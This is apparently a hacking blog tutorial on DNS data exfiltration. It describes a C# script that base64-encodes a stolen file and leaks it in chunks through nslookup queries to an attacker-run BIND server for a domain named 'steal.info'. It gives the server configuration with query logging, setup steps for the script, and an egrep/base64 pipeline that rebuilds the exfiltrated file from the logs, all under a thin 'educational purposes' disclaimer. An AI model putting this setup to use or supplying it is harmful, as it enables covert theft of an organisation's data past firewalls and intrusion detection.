What is it?
Bad guys are using various methods to exfiltration data from organization or any target.basiclly they need to exfiltration data without being detected.most of organizations use firewalls and IDS to secure their network but allowing DNS(incoming/outgoing) 😀 so over the dns we can transfers files and other important stuff 😉 here i wrote a simple C# script to demonstrate the attack.For Educational Purposes Only
How does it work?
The idea is simple, the script will encode your data and split it into small parts and make nslookup requests to a remote server, then parse the logs on the remote server and decode the file.
Prerequisite
- Linux box with DNS a server
- also you need to enable dns query logging 🙂
- DnsExfiltration Script
this is how my configatution files looks like
cat named.conf | |
include "/etc/bind/named.conf.options"; | |
include "/etc/bind/named.conf.local"; | |
include "/etc/bind/named.conf.default-zones"; | |
logging{ | |
channel querylog{ | |
file "/var/log/qrlog"; | |
print-category yes; | |
print-time yes; | |
}; | |
category queries{ querylog;}; | |
}; | |
cat db.steal.info | |
$TTL 86400 | |
@ IN SOA steal.info. root.localhost. ( | |
1 ; Serial | |
604800 ; Refresh | |
86400 ; Retry | |
2419200 ; Expire | |
86400 ) ; Negative Cache TTL | |
; | |
@ IN NS localhost. | |
IN A 10.0.0.1 | |
}; | |
cat named.conf.local | |
zone "steal.info"{ | |
type master; | |
file "/etc/bind/db.steal.info"; | |
}; |
Getting started
- Download and edit DnsExfiltration Script
- static String Domain = “YOUR-DOMAIN-NAME”;Â //add your bind domain
- static String NSserver = “YOUR-NAME-SERVER”;//add your dns server ip address
- Call ConvertInto64(string FileTosteal,string PathTosaveEncodedFile) function in main method
- call SendFile(string PathTosaveEncodedFile)
- in linux box open terminal and run this command to Reassemble the file
- egrep -o “[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME” /var/log/qrlog | cut -d . -f1 | uniq | awk ‘!a[$0]++’ > /pathToSave/file.bin
- base64 -d file.bin > decoded.jpg
- Done!
Demo Video
i tested this script with following file types and its working 🙂
- jpg 1Mb
- mp3 3MB
- exe 1MB
Happy Hacking!
Reference
https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664